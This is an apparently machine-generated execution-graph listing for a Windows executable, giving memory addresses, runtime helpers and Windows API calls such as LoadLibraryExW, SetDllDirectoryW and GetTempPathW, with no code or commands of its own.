                                                                                      execution_graph 20137 7ff7f3dfadfe 20138 7ff7f3dfae0d 20137->20138 20139 7ff7f3dfae17 20137->20139 20141 7ff7f3df0338 LeaveCriticalSection 20138->20141 20142 7ff7f3de5410 20143 7ff7f3de541b 20142->20143 20151 7ff7f3def2a4 20143->20151 20164 7ff7f3df02d8 EnterCriticalSection 20151->20164 20338 7ff7f3def98c 20339 7ff7f3defb7e 20338->20339 20341 7ff7f3def9ce _isindst 20338->20341 20340 7ff7f3de4f08 _get_daylight 11 API calls 20339->20340 20358 7ff7f3defb6e 20340->20358 20341->20339 20344 7ff7f3defa4e _isindst 20341->20344 20342 7ff7f3ddc550 _log10_special 8 API calls 20343 7ff7f3defb99 20342->20343 20359 7ff7f3df6194 20344->20359 20349 7ff7f3defbaa 20351 7ff7f3dea900 _isindst 17 API calls 20349->20351 20353 7ff7f3defbbe 20351->20353 20356 7ff7f3defaab 20356->20358 20383 7ff7f3df61d8 20356->20383 20358->20342 20360 7ff7f3df61a3 20359->20360 20364 7ff7f3defa6c 20359->20364 20390 7ff7f3df02d8 EnterCriticalSection 20360->20390 20365 7ff7f3df5598 20364->20365 20366 7ff7f3df55a1 20365->20366 20367 7ff7f3defa81 20365->20367 20368 7ff7f3de4f08 _get_daylight 11 API calls 20366->20368 20367->20349 20371 7ff7f3df55c8 20367->20371 20369 7ff7f3df55a6 20368->20369 20370 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 20369->20370 20370->20367 20372 7ff7f3df55d1 20371->20372 20373 7ff7f3defa92 20371->20373 20374 7ff7f3de4f08 _get_daylight 11 API calls 20372->20374 20373->20349 20377 7ff7f3df55f8 20373->20377 20375 7ff7f3df55d6 20374->20375 20376 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 20375->20376 20376->20373 20378 7ff7f3df5601 20377->20378 20379 7ff7f3defaa3 20377->20379 20380 7ff7f3de4f08 _get_daylight 11 API calls 20378->20380 20379->20349 20379->20356 20381 7ff7f3df5606 20380->20381 20382 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 20381->20382 20382->20379 20391 7ff7f3df02d8 EnterCriticalSection 20383->20391 20174 7ff7f3dfabe3 20175 7ff7f3dfabf3 20174->20175 20178 7ff7f3de5478 LeaveCriticalSection 20175->20178 15894 7ff7f3ddbae0 15895 7ff7f3ddbb0e 15894->15895 15896 7ff7f3ddbaf5 15894->15896 15896->15895 15899 7ff7f3ded5fc 15896->15899 15900 7ff7f3ded647 15899->15900 15904 7ff7f3ded60b _get_daylight 15899->15904 15909 7ff7f3de4f08 15900->15909 15901 7ff7f3ded62e HeapAlloc 15903 7ff7f3ddbb6e 15901->15903 15901->15904 15904->15900 15904->15901 15906 7ff7f3df3590 15904->15906 15912 7ff7f3df35d0 15906->15912 15918 7ff7f3deb2c8 GetLastError 15909->15918 15911 7ff7f3de4f11 15911->15903 15917 7ff7f3df02d8 EnterCriticalSection 15912->15917 15919 7ff7f3deb309 FlsSetValue 15918->15919 15923 7ff7f3deb2ec 15918->15923 15920 7ff7f3deb31b 15919->15920 15924 7ff7f3deb2f9 SetLastError 15919->15924 15935 7ff7f3deeb98 15920->15935 15923->15919 15923->15924 15924->15911 15926 7ff7f3deb348 FlsSetValue 15929 7ff7f3deb366 15926->15929 15930 7ff7f3deb354 FlsSetValue 15926->15930 15927 7ff7f3deb338 FlsSetValue 15928 7ff7f3deb341 15927->15928 15942 7ff7f3dea948 15928->15942 15948 7ff7f3deaef4 15929->15948 15930->15928 15936 7ff7f3deeba9 _get_daylight 15935->15936 15937 7ff7f3deebfa 15936->15937 15938 7ff7f3deebde HeapAlloc 15936->15938 15941 7ff7f3df3590 _get_daylight 2 API calls 15936->15941 15940 7ff7f3de4f08 _get_daylight 10 API calls 15937->15940 15938->15936 15939 7ff7f3deb32a 15938->15939 15939->15926 15939->15927 15940->15939 15941->15936 15943 7ff7f3dea97c 15942->15943 15944 7ff7f3dea94d RtlFreeHeap 15942->15944 15943->15924 15944->15943 15945 7ff7f3dea968 GetLastError 15944->15945 15946 7ff7f3dea975 __free_lconv_num 15945->15946 15947 7ff7f3de4f08 _get_daylight 9 API calls 15946->15947 15947->15943 15953 7ff7f3deadcc 15948->15953 15965 7ff7f3df02d8 EnterCriticalSection 15953->15965 20483 7ff7f3dfad69 20486 7ff7f3de5478 LeaveCriticalSection 20483->20486 15967 7ff7f3ddcc3c 15988 7ff7f3ddce0c 15967->15988 15970 7ff7f3ddcd88 16142 7ff7f3ddd12c IsProcessorFeaturePresent 15970->16142 15971 7ff7f3ddcc58 __scrt_acquire_startup_lock 15973 7ff7f3ddcd92 15971->15973 15980 7ff7f3ddcc76 __scrt_release_startup_lock 15971->15980 15974 7ff7f3ddd12c 7 API calls 15973->15974 15976 7ff7f3ddcd9d __FrameHandler3::FrameUnwindToEmptyState 15974->15976 15975 7ff7f3ddcc9b 15977 7ff7f3ddcd21 15994 7ff7f3ddd274 15977->15994 15979 7ff7f3ddcd26 15997 7ff7f3dd1000 15979->15997 15980->15975 15980->15977 16131 7ff7f3de9b2c 15980->16131 15985 7ff7f3ddcd49 15985->15976 16138 7ff7f3ddcf90 15985->16138 15989 7ff7f3ddce14 15988->15989 15990 7ff7f3ddce20 __scrt_dllmain_crt_thread_attach 15989->15990 15991 7ff7f3ddcc50 15990->15991 15992 7ff7f3ddce2d 15990->15992 15991->15970 15991->15971 15992->15991 16149 7ff7f3ddd888 15992->16149 16176 7ff7f3dfa4d0 15994->16176 15998 7ff7f3dd1009 15997->15998 16178 7ff7f3de5484 15998->16178 16000 7ff7f3dd37fb 16185 7ff7f3dd36b0 16000->16185 16006 7ff7f3dd391b 16354 7ff7f3dd45c0 16006->16354 16007 7ff7f3dd383c 16345 7ff7f3dd1c80 16007->16345 16011 7ff7f3dd385b 16257 7ff7f3dd8830 16011->16257 16014 7ff7f3dd396a 16377 7ff7f3dd2710 16014->16377 16016 7ff7f3dd388e 16024 7ff7f3dd38bb __std_exception_copy 16016->16024 16349 7ff7f3dd89a0 16016->16349 16018 7ff7f3dd395d 16019 7ff7f3dd3984 16018->16019 16020 7ff7f3dd3962 16018->16020 16022 7ff7f3dd1c80 49 API calls 16019->16022 16373 7ff7f3de004c 16020->16373 16025 7ff7f3dd39a3 16022->16025 16026 7ff7f3dd8830 14 API calls 16024->16026 16033 7ff7f3dd38de __std_exception_copy 16024->16033 16030 7ff7f3dd1950 115 API calls 16025->16030 16026->16033 16028 7ff7f3dd3a0b 16029 7ff7f3dd89a0 40 API calls 16028->16029 16031 7ff7f3dd3a17 16029->16031 16032 7ff7f3dd39ce 16030->16032 16034 7ff7f3dd89a0 40 API calls 16031->16034 16032->16011 16035 7ff7f3dd39de 16032->16035 16039 7ff7f3dd390e __std_exception_copy 16033->16039 16388 7ff7f3dd8940 16033->16388 16036 7ff7f3dd3a23 16034->16036 16037 7ff7f3dd2710 54 API calls 16035->16037 16038 7ff7f3dd89a0 40 API calls 16036->16038 16079 7ff7f3dd3808 __std_exception_copy 16037->16079 16038->16039 16040 7ff7f3dd8830 14 API calls 16039->16040 16041 7ff7f3dd3a3b 16040->16041 16042 7ff7f3dd3b2f 16041->16042 16043 7ff7f3dd3a60 __std_exception_copy 16041->16043 16044 7ff7f3dd2710 54 API calls 16042->16044 16045 7ff7f3dd8940 40 API calls 16043->16045 16056 7ff7f3dd3aab 16043->16056 16044->16079 16045->16056 16046 7ff7f3dd8830 14 API calls 16047 7ff7f3dd3bf4 __std_exception_copy 16046->16047 16048 7ff7f3dd3c46 16047->16048 16049 7ff7f3dd3d41 16047->16049 16050 7ff7f3dd3cd4 16048->16050 16051 7ff7f3dd3c50 16048->16051 16404 7ff7f3dd44e0 16049->16404 16054 7ff7f3dd8830 14 API calls 16050->16054 16270 7ff7f3dd90e0 16051->16270 16058 7ff7f3dd3ce0 16054->16058 16055 7ff7f3dd3d4f 16059 7ff7f3dd3d65 16055->16059 16060 7ff7f3dd3d71 16055->16060 16056->16046 16061 7ff7f3dd3c61 16058->16061 16064 7ff7f3dd3ced 16058->16064 16407 7ff7f3dd4630 16059->16407 16063 7ff7f3dd1c80 49 API calls 16060->16063 16067 7ff7f3dd2710 54 API calls 16061->16067 16074 7ff7f3dd3cc8 __std_exception_copy 16063->16074 16068 7ff7f3dd1c80 49 API calls 16064->16068 16067->16079 16071 7ff7f3dd3d0b 16068->16071 16069 7ff7f3dd3dbc 16320 7ff7f3dd9390 16069->16320 16073 7ff7f3dd3d12 16071->16073 16071->16074 16072 7ff7f3dd3dcf SetDllDirectoryW 16078 7ff7f3dd3e02 16072->16078 16121 7ff7f3dd3e52 16072->16121 16077 7ff7f3dd2710 54 API calls 16073->16077 16074->16069 16075 7ff7f3dd3da7 LoadLibraryExW 16074->16075 16075->16069 16077->16079 16081 7ff7f3dd8830 14 API calls 16078->16081 16395 7ff7f3ddc550 16079->16395 16080 7ff7f3dd4000 16083 7ff7f3dd402d 16080->16083 16084 7ff7f3dd400a PostMessageW GetMessageW 16080->16084 16088 7ff7f3dd3e0e __std_exception_copy 16081->16088 16082 7ff7f3dd3f13 16325 7ff7f3dd33c0 16082->16325 16484 7ff7f3dd3360 16083->16484 16084->16083 16091 7ff7f3dd3eea 16088->16091 16095 7ff7f3dd3e46 16088->16095 16094 7ff7f3dd8940 40 API calls 16091->16094 16094->16121 16095->16121 16410 7ff7f3dd6dc0 16095->16410 16121->16080 16121->16082 16132 7ff7f3de9b43 16131->16132 16133 7ff7f3de9b64 16131->16133 16132->15977 18653 7ff7f3dea3d8 16133->18653 16136 7ff7f3ddd2b8 GetModuleHandleW 16137 7ff7f3ddd2c9 16136->16137 16137->15985 16139 7ff7f3ddcfa1 16138->16139 16140 7ff7f3ddcd60 16139->16140 16141 7ff7f3ddd888 7 API calls 16139->16141 16140->15975 16141->16140 16143 7ff7f3ddd152 _isindst __scrt_get_show_window_mode 16142->16143 16144 7ff7f3ddd171 RtlCaptureContext RtlLookupFunctionEntry 16143->16144 16145 7ff7f3ddd1d6 __scrt_get_show_window_mode 16144->16145 16146 7ff7f3ddd19a RtlVirtualUnwind 16144->16146 16147 7ff7f3ddd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16145->16147 16146->16145 16148 7ff7f3ddd256 _isindst 16147->16148 16148->15973 16150 7ff7f3ddd890 16149->16150 16151 7ff7f3ddd89a 16149->16151 16155 7ff7f3dddc24 16150->16155 16151->15991 16156 7ff7f3dddc33 16155->16156 16157 7ff7f3ddd895 16155->16157 16163 7ff7f3ddde60 16156->16163 16159 7ff7f3dddc90 16157->16159 16160 7ff7f3dddcbb 16159->16160 16161 7ff7f3dddcbf 16160->16161 16162 7ff7f3dddc9e DeleteCriticalSection 16160->16162 16161->16151 16162->16160 16167 7ff7f3dddcc8 16163->16167 16172 7ff7f3dddd0c __vcrt_InitializeCriticalSectionEx 16167->16172 16174 7ff7f3ddddb2 TlsFree 16167->16174 16168 7ff7f3dddd3a LoadLibraryExW 16170 7ff7f3dddd5b GetLastError 16168->16170 16171 7ff7f3ddddd9 16168->16171 16169 7ff7f3ddddf9 GetProcAddress 16169->16174 16170->16172 16171->16169 16173 7ff7f3ddddf0 FreeLibrary 16171->16173 16172->16168 16172->16169 16172->16174 16175 7ff7f3dddd7d LoadLibraryExW 16172->16175 16173->16169 16175->16171 16175->16172 16177 7ff7f3ddd28b GetStartupInfoW 16176->16177 16177->15979 16179 7ff7f3def480 16178->16179 16181 7ff7f3def526 16179->16181 16182 7ff7f3def4d3 16179->16182 16507 7ff7f3def358 16181->16507 16497 7ff7f3dea814 16182->16497 16184 7ff7f3def4fc 16184->16000 16553 7ff7f3ddc850 16185->16553 16188 7ff7f3dd3710 16555 7ff7f3dd9280 FindFirstFileExW 16188->16555 16189 7ff7f3dd36eb GetLastError 16560 7ff7f3dd2c50 16189->16560 16193 7ff7f3dd3723 16575 7ff7f3dd9300 CreateFileW 16193->16575 16194 7ff7f3dd377d 16586 7ff7f3dd9440 16194->16586 16196 7ff7f3ddc550 _log10_special 8 API calls 16199 7ff7f3dd37b5 16196->16199 16198 7ff7f3dd378b 16203 7ff7f3dd2810 49 API calls 16198->16203 16206 7ff7f3dd3706 16198->16206 16199->16079 16207 7ff7f3dd1950 16199->16207 16201 7ff7f3dd3734 16578 7ff7f3dd2810 16201->16578 16203->16206 16205 7ff7f3dd374c __vcrt_InitializeCriticalSectionEx 16205->16194 16206->16196 16208 7ff7f3dd45c0 108 API calls 16207->16208 16209 7ff7f3dd1985 16208->16209 16210 7ff7f3dd1c43 16209->16210 16212 7ff7f3dd7f90 83 API calls 16209->16212 16211 7ff7f3ddc550 _log10_special 8 API calls 16210->16211 16213 7ff7f3dd1c5e 16211->16213 16214 7ff7f3dd19cb 16212->16214 16213->16006 16213->16007 16256 7ff7f3dd1a03 16214->16256 16984 7ff7f3de06d4 16214->16984 16215 7ff7f3de004c 74 API calls 16215->16210 16217 7ff7f3dd19e5 16218 7ff7f3dd1a08 16217->16218 16219 7ff7f3dd19e9 16217->16219 16988 7ff7f3de039c 16218->16988 16220 7ff7f3de4f08 _get_daylight 11 API calls 16219->16220 16222 7ff7f3dd19ee 16220->16222 16991 7ff7f3dd2910 16222->16991 16225 7ff7f3dd1a45 16229 7ff7f3dd1a7b 16225->16229 16230 7ff7f3dd1a5c 16225->16230 16226 7ff7f3dd1a26 16227 7ff7f3de4f08 _get_daylight 11 API calls 16226->16227 16228 7ff7f3dd1a2b 16227->16228 16231 7ff7f3dd2910 54 API calls 16228->16231 16233 7ff7f3dd1c80 49 API calls 16229->16233 16232 7ff7f3de4f08 _get_daylight 11 API calls 16230->16232 16231->16256 16234 7ff7f3dd1a61 16232->16234 16235 7ff7f3dd1a92 16233->16235 16236 7ff7f3dd2910 54 API calls 16234->16236 16237 7ff7f3dd1c80 49 API calls 16235->16237 16236->16256 16238 7ff7f3dd1add 16237->16238 16239 7ff7f3de06d4 73 API calls 16238->16239 16240 7ff7f3dd1b01 16239->16240 16241 7ff7f3dd1b35 16240->16241 16242 7ff7f3dd1b16 16240->16242 16244 7ff7f3de039c _fread_nolock 53 API calls 16241->16244 16243 7ff7f3de4f08 _get_daylight 11 API calls 16242->16243 16245 7ff7f3dd1b1b 16243->16245 16246 7ff7f3dd1b4a 16244->16246 16247 7ff7f3dd2910 54 API calls 16245->16247 16248 7ff7f3dd1b6f 16246->16248 16249 7ff7f3dd1b50 16246->16249 16247->16256 17006 7ff7f3de0110 16248->17006 16250 7ff7f3de4f08 _get_daylight 11 API calls 16249->16250 16252 7ff7f3dd1b55 16250->16252 16254 7ff7f3dd2910 54 API calls 16252->16254 16254->16256 16255 7ff7f3dd2710 54 API calls 16255->16256 16256->16215 16258 7ff7f3dd883a 16257->16258 16259 7ff7f3dd9390 2 API calls 16258->16259 16260 7ff7f3dd8859 GetEnvironmentVariableW 16259->16260 16261 7ff7f3dd8876 ExpandEnvironmentStringsW 16260->16261 16262 7ff7f3dd88c2 16260->16262 16261->16262 16264 7ff7f3dd8898 16261->16264 16263 7ff7f3ddc550 _log10_special 8 API calls 16262->16263 16265 7ff7f3dd88d4 16263->16265 16266 7ff7f3dd9440 2 API calls 16264->16266 16265->16016 16267 7ff7f3dd88aa 16266->16267 16268 7ff7f3ddc550 _log10_special 8 API calls 16267->16268 16269 7ff7f3dd88ba 16268->16269 16269->16016 16271 7ff7f3dd90f5 16270->16271 17224 7ff7f3dd8570 GetCurrentProcess OpenProcessToken 16271->17224 16274 7ff7f3dd8570 7 API calls 16275 7ff7f3dd9121 16274->16275 16276 7ff7f3dd9154 16275->16276 16277 7ff7f3dd913a 16275->16277 16279 7ff7f3dd26b0 48 API calls 16276->16279 16278 7ff7f3dd26b0 48 API calls 16277->16278 16280 7ff7f3dd9152 16278->16280 16281 7ff7f3dd9167 LocalFree LocalFree 16279->16281 16280->16281 16282 7ff7f3dd9183 16281->16282 16284 7ff7f3dd918f 16281->16284 17234 7ff7f3dd2b50 16282->17234 16285 7ff7f3ddc550 _log10_special 8 API calls 16284->16285 16286 7ff7f3dd3c55 16285->16286 16286->16061 16287 7ff7f3dd8660 16286->16287 16288 7ff7f3dd8678 16287->16288 16289 7ff7f3dd869c 16288->16289 16290 7ff7f3dd86fa GetTempPathW GetCurrentProcessId 16288->16290 16292 7ff7f3dd8830 14 API calls 16289->16292 17243 7ff7f3dd25c0 16290->17243 16293 7ff7f3dd86a8 16292->16293 17250 7ff7f3dd81d0 16293->17250 16300 7ff7f3dd8728 __std_exception_copy 16307 7ff7f3dd8765 __std_exception_copy 16300->16307 17247 7ff7f3de8b68 16300->17247 16305 7ff7f3dd87d4 __std_exception_copy 16306 7ff7f3ddc550 _log10_special 8 API calls 16305->16306 16309 7ff7f3dd3cbb 16306->16309 16307->16305 16312 7ff7f3dd9390 2 API calls 16307->16312 16309->16061 16309->16074 16313 7ff7f3dd87b1 16312->16313 16314 7ff7f3dd87b6 16313->16314 16315 7ff7f3dd87e9 16313->16315 16317 7ff7f3dd9390 2 API calls 16314->16317 16316 7ff7f3de8238 38 API calls 16315->16316 16316->16305 16321 7ff7f3dd93b2 MultiByteToWideChar 16320->16321 16322 7ff7f3dd93d6 16320->16322 16321->16322 16324 7ff7f3dd93ec __std_exception_copy 16321->16324 16323 7ff7f3dd93f3 MultiByteToWideChar 16322->16323 16322->16324 16323->16324 16324->16072 16330 7ff7f3dd33ce __scrt_get_show_window_mode 16325->16330 16326 7ff7f3dd35c7 16327 7ff7f3ddc550 _log10_special 8 API calls 16326->16327 16328 7ff7f3dd3664 16327->16328 16328->16079 16344 7ff7f3dd90c0 LocalFree 16328->16344 16330->16326 16331 7ff7f3dd1c80 49 API calls 16330->16331 16333 7ff7f3dd35e2 16330->16333 16336 7ff7f3dd35c9 16330->16336 16338 7ff7f3dd2a50 54 API calls 16330->16338 16342 7ff7f3dd35d0 16330->16342 17539 7ff7f3dd4560 16330->17539 17545 7ff7f3dd7e20 16330->17545 17557 7ff7f3dd1600 16330->17557 17605 7ff7f3dd7120 16330->17605 17609 7ff7f3dd4190 16330->17609 17653 7ff7f3dd4450 16330->17653 16331->16330 16334 7ff7f3dd2710 54 API calls 16333->16334 16334->16326 16339 7ff7f3dd2710 54 API calls 16336->16339 16338->16330 16339->16326 16343 7ff7f3dd2710 54 API calls 16342->16343 16343->16326 16346 7ff7f3dd1ca5 16345->16346 16347 7ff7f3de4984 49 API calls 16346->16347 16348 7ff7f3dd1cc8 16347->16348 16348->16011 16350 7ff7f3dd9390 2 API calls 16349->16350 16351 7ff7f3dd89b4 16350->16351 16352 7ff7f3de8238 38 API calls 16351->16352 16353 7ff7f3dd89c6 __std_exception_copy 16352->16353 16353->16024 16355 7ff7f3dd45cc 16354->16355 16356 7ff7f3dd9390 2 API calls 16355->16356 16357 7ff7f3dd45f4 16356->16357 16358 7ff7f3dd9390 2 API calls 16357->16358 16359 7ff7f3dd4607 16358->16359 17836 7ff7f3de5f94 16359->17836 16362 7ff7f3ddc550 _log10_special 8 API calls 16363 7ff7f3dd392b 16362->16363 16363->16014 16364 7ff7f3dd7f90 16363->16364 16365 7ff7f3dd7fb4 16364->16365 16366 7ff7f3de06d4 73 API calls 16365->16366 16367 7ff7f3dd808b __std_exception_copy 16365->16367 16368 7ff7f3dd7fd0 16366->16368 16367->16018 16368->16367 18227 7ff7f3de78c8 16368->18227 16370 7ff7f3de06d4 73 API calls 16372 7ff7f3dd7fe5 16370->16372 16371 7ff7f3de039c _fread_nolock 53 API calls 16371->16372 16372->16367 16372->16370 16372->16371 16374 7ff7f3de007c 16373->16374 18242 7ff7f3ddfe28 16374->18242 16376 7ff7f3de0095 16376->16014 16378 7ff7f3ddc850 16377->16378 16379 7ff7f3dd2734 GetCurrentProcessId 16378->16379 16380 7ff7f3dd1c80 49 API calls 16379->16380 16381 7ff7f3dd2787 16380->16381 16382 7ff7f3de4984 49 API calls 16381->16382 16383 7ff7f3dd27cf 16382->16383 16384 7ff7f3dd2620 12 API calls 16383->16384 16385 7ff7f3dd27f1 16384->16385 16386 7ff7f3ddc550 _log10_special 8 API calls 16385->16386 16387 7ff7f3dd2801 16386->16387 16387->16079 16389 7ff7f3dd9390 2 API calls 16388->16389 16390 7ff7f3dd895c 16389->16390 16391 7ff7f3dd9390 2 API calls 16390->16391 16392 7ff7f3dd896c 16391->16392 16393 7ff7f3de8238 38 API calls 16392->16393 16394 7ff7f3dd897a __std_exception_copy 16393->16394 16394->16028 16396 7ff7f3ddc559 16395->16396 16397 7ff7f3dd3ca7 16396->16397 16398 7ff7f3ddc8e0 IsProcessorFeaturePresent 16396->16398 16397->16136 16399 7ff7f3ddc8f8 16398->16399 18253 7ff7f3ddcad8 RtlCaptureContext 16399->18253 16405 7ff7f3dd1c80 49 API calls 16404->16405 16406 7ff7f3dd44fd 16405->16406 16406->16055 16408 7ff7f3dd1c80 49 API calls 16407->16408 16409 7ff7f3dd4660 16408->16409 16409->16074 16411 7ff7f3dd6dd5 16410->16411 16412 7ff7f3dd3e64 16411->16412 16413 7ff7f3de4f08 _get_daylight 11 API calls 16411->16413 16416 7ff7f3dd7340 16412->16416 16414 7ff7f3dd6de2 16413->16414 16415 7ff7f3dd2910 54 API calls 16414->16415 16415->16412 18258 7ff7f3dd1470 16416->18258 16418 7ff7f3dd7368 16419 7ff7f3dd4630 49 API calls 16418->16419 16429 7ff7f3dd74b9 __std_exception_copy 16418->16429 18364 7ff7f3dd6360 16484->18364 16492 7ff7f3dd3399 16493 7ff7f3dd3670 16492->16493 16514 7ff7f3dea55c 16497->16514 16500 7ff7f3dea84f 16500->16184 16552 7ff7f3de546c EnterCriticalSection 16507->16552 16515 7ff7f3dea5b3 16514->16515 16516 7ff7f3dea578 GetLastError 16514->16516 16515->16500 16520 7ff7f3dea5c8 16515->16520 16517 7ff7f3dea588 16516->16517 16527 7ff7f3deb390 16517->16527 16521 7ff7f3dea5e4 GetLastError SetLastError 16520->16521 16522 7ff7f3dea5fc 16520->16522 16521->16522 16522->16500 16523 7ff7f3dea900 IsProcessorFeaturePresent 16522->16523 16524 7ff7f3dea913 16523->16524 16544 7ff7f3dea614 16524->16544 16528 7ff7f3deb3af FlsGetValue 16527->16528 16529 7ff7f3deb3ca FlsSetValue 16527->16529 16530 7ff7f3deb3c4 16528->16530 16542 7ff7f3dea5a3 SetLastError 16528->16542 16531 7ff7f3deb3d7 16529->16531 16529->16542 16530->16529 16532 7ff7f3deeb98 _get_daylight 11 API calls 16531->16532 16533 7ff7f3deb3e6 16532->16533 16534 7ff7f3deb404 FlsSetValue 16533->16534 16535 7ff7f3deb3f4 FlsSetValue 16533->16535 16537 7ff7f3deb422 16534->16537 16538 7ff7f3deb410 FlsSetValue 16534->16538 16536 7ff7f3deb3fd 16535->16536 16540 7ff7f3dea948 __free_lconv_num 11 API calls 16536->16540 16539 7ff7f3deaef4 _get_daylight 11 API calls 16537->16539 16538->16536 16541 7ff7f3deb42a 16539->16541 16540->16542 16543 7ff7f3dea948 __free_lconv_num 11 API calls 16541->16543 16542->16515 16543->16542 16545 7ff7f3dea64e _isindst __scrt_get_show_window_mode 16544->16545 16546 7ff7f3dea676 RtlCaptureContext RtlLookupFunctionEntry 16545->16546 16547 7ff7f3dea6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16546->16547 16548 7ff7f3dea6b0 RtlVirtualUnwind 16546->16548 16549 7ff7f3dea738 _isindst 16547->16549 16548->16547 16550 7ff7f3ddc550 _log10_special 8 API calls 16549->16550 16551 7ff7f3dea757 GetCurrentProcess TerminateProcess 16550->16551 16554 7ff7f3dd36bc GetModuleFileNameW 16553->16554 16554->16188 16554->16189 16556 7ff7f3dd92bf FindClose 16555->16556 16557 7ff7f3dd92d2 16555->16557 16556->16557 16558 7ff7f3ddc550 _log10_special 8 API calls 16557->16558 16559 7ff7f3dd371a 16558->16559 16559->16193 16559->16194 16561 7ff7f3ddc850 16560->16561 16562 7ff7f3dd2c70 GetCurrentProcessId 16561->16562 16591 7ff7f3dd26b0 16562->16591 16564 7ff7f3dd2cb9 16595 7ff7f3de4bd8 16564->16595 16567 7ff7f3dd26b0 48 API calls 16568 7ff7f3dd2d34 FormatMessageW 16567->16568 16570 7ff7f3dd2d7f MessageBoxW 16568->16570 16571 7ff7f3dd2d6d 16568->16571 16572 7ff7f3ddc550 _log10_special 8 API calls 16570->16572 16573 7ff7f3dd26b0 48 API calls 16571->16573 16574 7ff7f3dd2daf 16572->16574 16573->16570 16574->16206 16576 7ff7f3dd9340 GetFinalPathNameByHandleW CloseHandle 16575->16576 16577 7ff7f3dd3730 16575->16577 16576->16577 16577->16201 16577->16205 16579 7ff7f3dd2834 16578->16579 16580 7ff7f3dd26b0 48 API calls 16579->16580 16581 7ff7f3dd2887 16580->16581 16582 7ff7f3de4bd8 48 API calls 16581->16582 16583 7ff7f3dd28d0 MessageBoxW 16582->16583 16584 7ff7f3ddc550 _log10_special 8 API calls 16583->16584 16585 7ff7f3dd2900 16584->16585 16585->16206 16587 7ff7f3dd946a WideCharToMultiByte 16586->16587 16588 7ff7f3dd9495 16586->16588 16587->16588 16590 7ff7f3dd94ab __std_exception_copy 16587->16590 16589 7ff7f3dd94b2 WideCharToMultiByte 16588->16589 16588->16590 16589->16590 16590->16198 16592 7ff7f3dd26d5 16591->16592 16593 7ff7f3de4bd8 48 API calls 16592->16593 16594 7ff7f3dd26f8 16593->16594 16594->16564 16597 7ff7f3de4c32 16595->16597 16596 7ff7f3de4c57 16598 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16596->16598 16597->16596 16599 7ff7f3de4c93 16597->16599 16602 7ff7f3de4c81 16598->16602 16613 7ff7f3de2f90 16599->16613 16601 7ff7f3de4d74 16604 7ff7f3dea948 __free_lconv_num 11 API calls 16601->16604 16603 7ff7f3ddc550 _log10_special 8 API calls 16602->16603 16605 7ff7f3dd2d04 16603->16605 16604->16602 16605->16567 16607 7ff7f3de4d9a 16607->16601 16609 7ff7f3de4da4 16607->16609 16608 7ff7f3de4d49 16610 7ff7f3dea948 __free_lconv_num 11 API calls 16608->16610 16612 7ff7f3dea948 __free_lconv_num 11 API calls 16609->16612 16610->16602 16611 7ff7f3de4d40 16611->16601 16611->16608 16612->16602 16614 7ff7f3de2fce 16613->16614 16615 7ff7f3de2fbe 16613->16615 16616 7ff7f3de2fd7 16614->16616 16621 7ff7f3de3005 16614->16621 16619 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16615->16619 16617 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16616->16617 16618 7ff7f3de2ffd 16617->16618 16618->16601 16618->16607 16618->16608 16618->16611 16619->16618 16621->16615 16621->16618 16624 7ff7f3de39a4 16621->16624 16657 7ff7f3de33f0 16621->16657 16694 7ff7f3de2b80 16621->16694 16625 7ff7f3de39e6 16624->16625 16626 7ff7f3de3a57 16624->16626 16627 7ff7f3de3a81 16625->16627 16628 7ff7f3de39ec 16625->16628 16629 7ff7f3de3ab0 16626->16629 16630 7ff7f3de3a5c 16626->16630 16717 7ff7f3de1d54 16627->16717 16631 7ff7f3de3a20 16628->16631 16632 7ff7f3de39f1 16628->16632 16636 7ff7f3de3ac7 16629->16636 16637 7ff7f3de3aba 16629->16637 16641 7ff7f3de3abf 16629->16641 16633 7ff7f3de3a91 16630->16633 16634 7ff7f3de3a5e 16630->16634 16639 7ff7f3de39f7 16631->16639 16631->16641 16632->16636 16632->16639 16724 7ff7f3de1944 16633->16724 16635 7ff7f3de3a00 16634->16635 16644 7ff7f3de3a6d 16634->16644 16656 7ff7f3de3af0 16635->16656 16697 7ff7f3de4158 16635->16697 16731 7ff7f3de46ac 16636->16731 16637->16627 16637->16641 16639->16635 16645 7ff7f3de3a32 16639->16645 16652 7ff7f3de3a1b 16639->16652 16641->16656 16735 7ff7f3de2164 16641->16735 16644->16627 16647 7ff7f3de3a72 16644->16647 16645->16656 16707 7ff7f3de4494 16645->16707 16647->16656 16713 7ff7f3de4558 16647->16713 16649 7ff7f3ddc550 _log10_special 8 API calls 16651 7ff7f3de3dea 16649->16651 16651->16621 16655 7ff7f3de3cdc 16652->16655 16652->16656 16742 7ff7f3de47c0 16652->16742 16655->16656 16748 7ff7f3deea08 16655->16748 16656->16649 16658 7ff7f3de3414 16657->16658 16659 7ff7f3de33fe 16657->16659 16660 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16658->16660 16661 7ff7f3de3454 16658->16661 16659->16661 16662 7ff7f3de39e6 16659->16662 16663 7ff7f3de3a57 16659->16663 16660->16661 16661->16621 16664 7ff7f3de3a81 16662->16664 16665 7ff7f3de39ec 16662->16665 16666 7ff7f3de3ab0 16663->16666 16667 7ff7f3de3a5c 16663->16667 16675 7ff7f3de1d54 38 API calls 16664->16675 16668 7ff7f3de3a20 16665->16668 16669 7ff7f3de39f1 16665->16669 16673 7ff7f3de3ac7 16666->16673 16674 7ff7f3de3aba 16666->16674 16679 7ff7f3de3abf 16666->16679 16670 7ff7f3de3a91 16667->16670 16671 7ff7f3de3a5e 16667->16671 16676 7ff7f3de39f7 16668->16676 16668->16679 16669->16673 16669->16676 16677 7ff7f3de1944 38 API calls 16670->16677 16672 7ff7f3de3a00 16671->16672 16681 7ff7f3de3a6d 16671->16681 16678 7ff7f3de4158 47 API calls 16672->16678 16692 7ff7f3de3af0 16672->16692 16680 7ff7f3de46ac 45 API calls 16673->16680 16674->16664 16674->16679 16689 7ff7f3de3a1b 16675->16689 16676->16672 16682 7ff7f3de3a32 16676->16682 16676->16689 16677->16689 16678->16689 16683 7ff7f3de2164 38 API calls 16679->16683 16679->16692 16680->16689 16681->16664 16684 7ff7f3de3a72 16681->16684 16685 7ff7f3de4494 46 API calls 16682->16685 16682->16692 